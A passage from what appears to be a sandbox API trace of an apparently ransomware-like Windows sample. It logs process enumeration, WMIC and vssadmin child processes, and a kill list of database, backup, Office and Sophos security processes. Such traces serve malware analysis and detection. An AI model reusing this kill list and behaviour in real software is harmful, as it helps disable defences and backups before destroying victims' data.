lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0114.391] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0114.391] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0114.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.392] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571358 [0114.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3571358, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0114.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0114.392] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0114.392] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0114.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.394] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571100 [0114.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3571100, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0114.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0114.394] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0114.394] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0114.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.395] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571268 [0114.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3571268, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0114.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0114.395] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0114.395] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0114.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.396] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35713e8 [0114.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35713e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0114.397] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0114.397] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0114.397] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0114.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.398] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571400 [0114.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571400, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0114.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0114.398] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0114.398] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0114.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.399] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35713a0 [0114.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35713a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0114.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0114.399] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0114.399] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0114.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.400] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35713b8 [0114.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35713b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0114.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0114.400] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0114.400] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0114.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.402] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35713d0 [0114.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35713d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0114.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0114.402] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0114.402] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0114.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0114.403] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357f8c0 [0114.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357f8c0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0114.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0114.403] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0114.403] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0114.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.404] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357fa80 [0114.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357fa80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0114.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0114.404] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0114.405] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0114.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0114.406] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355c8f8 [0114.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x355c8f8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0114.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0114.406] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sql") returned 0x0 [0114.406] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.407] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582a68 [0114.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582a68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0114.408] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0114.408] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0114.408] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.409] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582c90 [0114.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582c90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0114.409] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0114.409] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0114.409] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0114.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.410] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582c60 [0114.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3582c60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0114.411] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0114.411] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0114.411] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0114.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.412] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582ab0 [0114.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3582ab0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0114.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0114.412] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0114.412] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0114.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.413] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357fb60 [0114.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357fb60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0114.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0114.413] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0114.413] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0114.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.415] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582ac8 [0114.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3582ac8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0114.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0114.415] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0114.415] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0114.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.416] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582be8 [0114.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x3582be8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIC.exe", lpUsedDefaultChar=0x0) returned 9 [0114.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIC.exe" | out: lpString1="WMIC.exe") returned="WMIC.exe" [0114.416] StrStrIA (lpFirst="WMIC.exe", lpSrch="sql") returned 0x0 [0114.416] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0114.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vssadmin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.417] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582b88 [0114.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vssadmin.exe", cchWideChar=-1, lpMultiByteStr=0x3582b88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin.exe", lpUsedDefaultChar=0x0) returned 13 [0114.417] lstrcpyA (in: lpString1=0x567fabc, lpString2="vssadmin.exe" | out: lpString1="vssadmin.exe") returned="vssadmin.exe" [0114.417] StrStrIA (lpFirst="vssadmin.exe", lpSrch="sql") returned 0x0 [0114.417] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x380, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.418] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582c30 [0114.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582c30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0114.418] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0114.418] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0114.418] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.420] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582a80 [0114.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582a80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0114.420] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0114.420] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0114.420] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0114.421] CloseHandle (hObject=0x370) returned 1 [0114.421] SetEvent (hEvent=0x210) returned 1 [0114.421] Sleep (dwMilliseconds=0x2710) [0125.244] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") 